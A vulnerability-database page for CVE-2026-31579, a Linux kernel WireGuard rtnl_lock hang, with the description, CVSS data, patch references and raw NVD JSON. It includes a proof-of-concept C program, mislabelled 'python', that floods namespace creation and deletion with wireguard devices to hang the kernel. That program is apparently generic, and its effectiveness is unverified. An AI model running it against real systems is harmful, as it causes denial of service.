CVE-2026-31579

Description

In the Linux kernel, the following vulnerability has been resolved: wireguard: device: use exit_rtnl callback instead of manual rtnl_lock in pre_exit wg_netns_pre_exit() manually acquires rtnl_lock() inside the pernet .pre_exit callback. This causes a hung task when another thread holds rtnl_mutex - the cleanup_net workqueue (or the setup_net failure rollback path) blocks indefinitely in wg_netns_pre_exit() waiting to acquire the lock. Convert to .exit_rtnl, introduced in commit 7a60d91c690b ("net: Add ->exit_rtnl() hook to struct pernet_operations."), where the framework already holds RTNL and batches all callbacks under a single rtnl_lock()/rtnl_unlock() pair, eliminating the contention window. The rcu_assign_pointer(wg->creating_net, NULL) is safe to move from .pre_exit to .exit_rtnl (which runs after synchronize_rcu()) because all RCU readers of creating_net either use maybe_get_net() - which returns NULL for a dying namespace with zero refcount - or access net->user_ns which remains valid throughout the entire ops_undo_list sequence. [ Jason: added __net_exit and __read_mostly annotations that were missing. ]

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (Mainline)

Linux Kernel (Stable branches prior to commits 1c52ef0, 60a25ef, 9a9e69, a1d0f6)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-31579: WireGuard Deadlock in wg_netns_pre_exit
 * This script attempts to trigger the race condition by rapidly
 * creating and destroying network namespaces with WireGuard devices.
 * Compilation: gcc -o poc_cve_2026_31579 poc_cve_2026_31579.c
 * Usage: ./poc_cve_2026_31579
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

void trigger_vulnerability() {
    char cmd[256];
    int i;
    // Loop to stress the netns pre_exit path
    for (i = 0; i < 500; i++) {
        // Create a network namespace
        snprintf(cmd, sizeof(cmd), "ip netns add test_ns_%d", i);
        if (system(cmd) != 0) continue;

        // Add a dummy WireGuard device (requires wireguard-tools)
        // This setup is simplified; real exploitation might need specific config
        snprintf(cmd, sizeof(cmd), "ip netns exec test_ns_%d ip link add wg0 type wireguard", i);
        system(cmd);

        // Delete the namespace to trigger wg_netns_pre_exit
        snprintf(cmd, sizeof(cmd), "ip netns delete test_ns_%d", i);
        system(cmd);
    }
}

int main() {
    printf("[+] Attempting to trigger CVE-2026-31579...\n");
    printf("[+] Monitor system for hung tasks or kernel warnings.\n");
    
    // Fork multiple processes to increase contention on rtnl_lock
    for (int i = 0; i < 5; i++) {
        if (fork() == 0) {
            trigger_vulnerability();
            exit(0);
        }
    }

    // Wait for children
    while (wait(NULL) > 0);
    
    printf("[-] PoC execution finished.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31579
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31579
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31579/
[4] VulDB https://vuldb.com/cve/CVE-2026-31579
[5] https://git.kernel.org/stable/c/1c52ef00e391144334f10995985c2f256d4be982
[6] https://git.kernel.org/stable/c/60a25ef8dacb3566b1a8c4de00572a498e2a3bf9
[7] https://git.kernel.org/stable/c/9a9e69155b2091b8297afaf1533b8d68a3096841
[8] https://git.kernel.org/stable/c/a1d0f6cbb962af29586e3e65a4bced1a5e39221f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31579", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:32.587", "lastModified": "2026-04-27T20:43:29.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: device: use exit_rtnl callback instead of manual rtnl_lock in pre_exit\n\nwg_netns_pre_exit() manually acquires rtnl_lock() inside the\npernet .pre_exit callback. This causes a hung task when another\nthread holds rtnl_mutex - the cleanup_net workqueue (or the\nsetup_net failure rollback path) blocks indefinitely in\nwg_netns_pre_exit() waiting to acquire the lock.\n\nConvert to .exit_rtnl, introduced in commit 7a60d91c690b (\"net:\nAdd ->exit_rtnl() hook to struct pernet_operations.\"), where the\nframework already holds RTNL and batches all callbacks under a\nsingle rtnl_lock()/rtnl_unlock() pair, eliminating the contention\nwindow.\n\nThe rcu_assign_pointer(wg->creating_net, NULL) is safe to move\nfrom .pre_exit to .exit_rtnl (which runs after synchronize_rcu())\nbecause all RCU readers of creating_net either use maybe_get_net()\n- which returns NULL for a dying namespace with zero refcount - or\naccess net->user_ns which remains valid throughout the entire\nops_undo_list sequence.\n\n[ Jason: added __net_exit and __read_mostly annotations that were missing. ]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.18.24", "matchCriteriaId": "E7BFA239-2F39-4B24-92AA-6F60AA187C18"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1c52ef00e391144334f10995985c2f256d4be982", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/60a25ef8dacb3566b1a8c4de00572a498e2a3bf9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9a9e69155b2091b8297afaf1533b8d68a3096841", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a1d0f6cbb962af29586e3e65a4bced1a5e39221f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}